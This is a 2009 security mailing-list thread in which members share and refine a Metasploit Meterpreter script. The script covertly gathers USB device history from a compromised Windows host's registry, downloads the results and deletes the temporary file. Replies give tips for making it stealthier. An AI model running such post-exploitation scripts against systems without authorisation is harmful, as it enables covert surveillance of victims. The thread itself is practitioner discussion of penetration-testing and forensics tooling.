if you want the data saved to a database, printed to the user and saved in
the logfile in case you created a db on and it is loaded in metasploit, if
not it will not be saved to it
*include** **Msf**::**Auxiliary**::**Report*
*message.each_line do |line|*
* print_status(line)*
* report_note(:host => host, :proto => 'TLV', :port => port, :type =>
'METERPRETER_INSTALLEDUSB', :data => "#{line}")*
* filewrt(log, line)*
*end*
I hope this is of help. Any other area you might need any advice let me know
I'm more than happy to help.
On Fri, Aug 14, 2009 at 7:58 PM, Carlos Perez <[email protected]
> wrote:
> save the data in the .msf3 log instead of writing it on the target, this
> will make your script smaller and more stealthy. here is the function I
> use for this on my scripts:
>
> *#Function for writing data to a file*
> *def filewrt(file2wrt, data2wrt)*
> * output = ::File.open(file2wrt, "a")*
> * data2wrt.each_line do |d|*
> * output.puts(d)*
> * end*
> * output.close*
> *end*
>
> just give it the log file and the data like this
>
> *log = **"#{logs}\\installedusb.txt"*
> *filewrt(log, message)*
>
> to create the message string variable do it like this:
>
> * message << " ==============================**
> ==============================**==============================**
> ==============================**\n" *
> * message << "\tFriendly Name : #{friendlyName.data}\n"*
> * message << "\t\t - Class : #{cl.data}\n" *
> * message << "\t\t- DeviceDesc : #{deviceDesc.data}\n"*
> * message << "\t\t - HardwareID : #{hardwareID.data}\n"*
>
> Iterate thru each key, get the values and close the key before going to the
> next.
>
> I hope this helps
>
>
> On Fri, Aug 14, 2009 at 4:47 PM, Dimitrios Kapsalis
> <[email protected]>wrote:
>
>> Here is a meterpreter script to pull the USB devices from the registry.
>>
>> Few issues in saving the output to a text file on the target before
>> downloading it. think its the \n that i'm adding. If anyone has any tips I'm
>> all ears.
>>
>> As well the output on the meterpreter screen will be
>>
>> run installedusb
>> [*] New session on 192.168.0.50:43304...
>> [*] -- Files saved to C:\Documents and Settings\user\Application
>> Data/.msf3/logs/installedsoftware/192.168.0.50_20090814.373838964...
>> [*] -- Data logged to C:\DOCUME~1\user\LOCALS~1\Temp\25.dat....
>> [*] Dumping software installed on pc per registry
>> HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR...
>> [*]
>> ========================================================================================================================
>> * Friendly Name : Apple iPod USB Device
>> - Class : DiskDrive
>> - DeviceDesc : Disk drive
>> - HardwareID :
>> USBSTOR\DiskApple___iPod____________1.62?USBSTOR\DiskApple___iPod____________?USBSTOR\DiskApple___?USBSTOR\Apple___iPod____________1?Apple___iPod____________1?USBSTOR\GenDisk?GenDisk??
>>
>> [*] -- Downloading C:\DOCUME~1\user\LOCALS~1\Temp\25.dat....
>> [*] -- C:\Documents and Settings\user\Application
>> Data/.msf3/logs/installedsoftware/192.168.0.50_20090814.373838964\installedusb.txt
>> downloaded!
>> [*] ...Done!!
>> [*] Completed processing on 192.168.0.50:43304...
>>
>>
>> [code]
>> #
>> # This is a Meterpreter script designed to be used by the Metasploit
>> Framework
>> #
>> # Meterpreter script for pulling forensics data from registry for any USB
>> device
>> # connected to system
>> #
>> # Provided by Dimitrios Kapsalis
>> # Verion: 0.1
>>
>>
>> require 'fileutils'
>>
>> #
>> ====================================================================================================================================
>> # Print message to file on target
>> #
>> ====================================================================================================================================
>> def m_writetofile(session,file,message)
>> cmd = "cmd /c echo #{message} >> #{file}"
>> m_exec(session, cmd)
>> end
>>
>> #
>> ====================================================================================================================================
>> # Delete a file (meterpreter has no unlink API yet)
>> #
>> ====================================================================================================================================
>> def m_unlink(session, path)
>> r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil,
>> {'Hidden' => 'true'})
>> while(r.name)
>> select(nil, nil, nil, 0.10)
>> end
>> r.close
>> end
>>
>> #
>> ====================================================================================================================================
>> # Exec a command and return the results
>> #
>> ====================================================================================================================================
>> def m_exec(session, cmd)
>> begin
>> r = session.sys.process.execute(cmd, nil, {'Hidden' => true,
>> 'Channelized' => true})
>> b = ""
>> while(d = r.channel.read)
>> b << d
>> end
>> r.channel.close
>> r.close
>> b
>> rescue ::Exception => e
>> print_status("Error Running Command #{cmd}: #{e.class} #{e}")
>> end
>> end
>>
>> #
>> ====================================================================================================================================
>> # Function to upload files
>> #
>> ====================================================================================================================================
>> def m_upload(session,file)
>> location = session.fs.file.expand_path("%temp%")
>> fileontrgt = "#{location}\\#{rand(100)}.exe"
>> print_status("\t-- Uploading #{file}....")
>> session.fs.file.upload_file("#{fileontrgt}","#{file}")
>> print_status("\t-- #{file} uploaded!")
>> print_status("\t-- File on target #{fileontrgt}")
>> return fileontrgt
>> end
>>
>> #
>> ====================================================================================================================================
>> # Function to download files
>> #
>> ====================================================================================================================================
>> def m_download(session,src,dst)
>> location = session.fs.file.expand_path("%temp%")
>> print_status("\t-- Downloading #{src}....")
>> session.fs.file.download_file("#{dst}","#{src}")
>> print_status("\t-- #{dst} downloaded!")
>> end
>>
>> #
>> ====================================================================================================================================
>> # Script proper
>> #
>> ====================================================================================================================================
>>
>> # The 'client' object holds the Meterpreter session
>> # Aliasing here for plugin compatibility
>> session = client
>>
>> script_name = "installedsoftware"
>>
>> # Extract the host and port
>> host,port = session.tunnel_peer.split(':')
>>
>> print_status("New session on #{host}:#{port}...")
>>
>> # Create a directory for the logs
>> logs = ::File.join(Msf::Config.config_directory, 'logs',script_name , host
>> + "_" + Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.5d",rand(100000)) )
>>
>> # Create the log directory
>> ::FileUtils.mkdir_p(logs)
>>
>> print_status("-- Files saved to #{logs}...")
>>
>> location = session.fs.file.expand_path("%temp%")
>> filename = "#{rand(100)}.dat"
>> fileontrgt = "#{location}\\#{filename}"
>> print_status("-- Data logged to #{fileontrgt}....")
>>
>>
>> begin
>>
>>
>> #===============================================================================================================================
>>
>> #===============================================================================================================================
>>
>> #===============================================================================================================================
>> # Pull USB history Pull USB history Pull USB history Pull USB history
>> Pull USB history Pull USB history Pull USB history
>>
>> #===============================================================================================================================
>>
>> #===============================================================================================================================
>>
>> #===============================================================================================================================
>>
>>
>> #===========================================================================================
>> # Dump USB device history
>>
>> #===========================================================================================
>>
>> key = "HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR"
>> root_key, base_key = session.sys.registry.splitkey(key)
>>
>>
>> message =
>> "---------------------------------------------------------------------"
>> m_writetofile(session,fileontrgt,message)
>> message = "Dumping software installed on pc per registry #{key}... "
>> print_status(message)
>> m_writetofile(session,fileontrgt,message)
>> message =
>> "---------------------------------------------------------------------"
>> m_writetofile(session,fileontrgt,message)
>>
>> session.sys.registry.create_key(root_key, base_key).each_key() do
>> |device|
>> puts device
>>
>> # =========================================
>> # ...
>> # =========================================
>> session.sys.registry.create_key(root_key,
>> "#{base_key}\\#{device}").each_key() do |intermediate|
>> puts intermediate
>>
>> rk = session.sys.registry.open_key(root_key,
>> "#{base_key}\\#{device}\\#{intermediate}", KEY_READ)
>> cl = rk.query_value("class")
>> deviceDesc = rk.query_value("DeviceDesc")
>> friendlyName = rk.query_value("FriendlyName")
>> hardwareID = rk.query_value("HardwareID")
>> message = "
>> ========================================================================================================================\n"
>> <<
>> " * Friendly Name : #{friendlyName.data}\n"
>> <<
>> " - Class : #{cl.data}\n" <<
>> " - DeviceDesc : #{deviceDesc.data}\n" <<
>>
>> " - HardwareID : #{hardwareID.data}\n"
>>
>>
>> print_status(message)
>> m_writetofile(session,fileontrgt,message)
>> end
>> end
>>
>>
>> #===========================================================================================
>> # download output file
>>
>> #===========================================================================================
>> m_download(session, fileontrgt, "#{logs}\\installedusb.txt")
>>
>> sleep(3)
>>
>> #===========================================================================================
>> # delete exe from target system
>>
>> #===========================================================================================
>> m_unlink(session, fileontrgt)
>> print_status("...Done!!")
>>
>> rescue ::Exception => e
>> print_status("Exception: #{e.class} #{e} #{e.backtrace}")
>> end
>>
>> print_status("Completed processing on #{host}:#{port}...")
>> [/code]
>>
>>
>>
>>
>> On Fri, Aug 14, 2009 at 12:57 PM, Dave Hull <[email protected]>wrote:
>>
>>> The user assist keys are ROT13 encoded!
>>>
>>> There's just so much good stuff. Volume shadow copies and restore
>>> points too. And the list goes on...
>>> _______________________________________________
>>> Pauldotcom mailing list
>>> [email protected]
>>> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
>>> Main Web Site: http://pauldotcom.com
>>>
>>
>>
>> _______________________________________________
>> Pauldotcom mailing list
>> [email protected]
>> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
>> Main Web Site: http://pauldotcom.com
>>
>
>
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
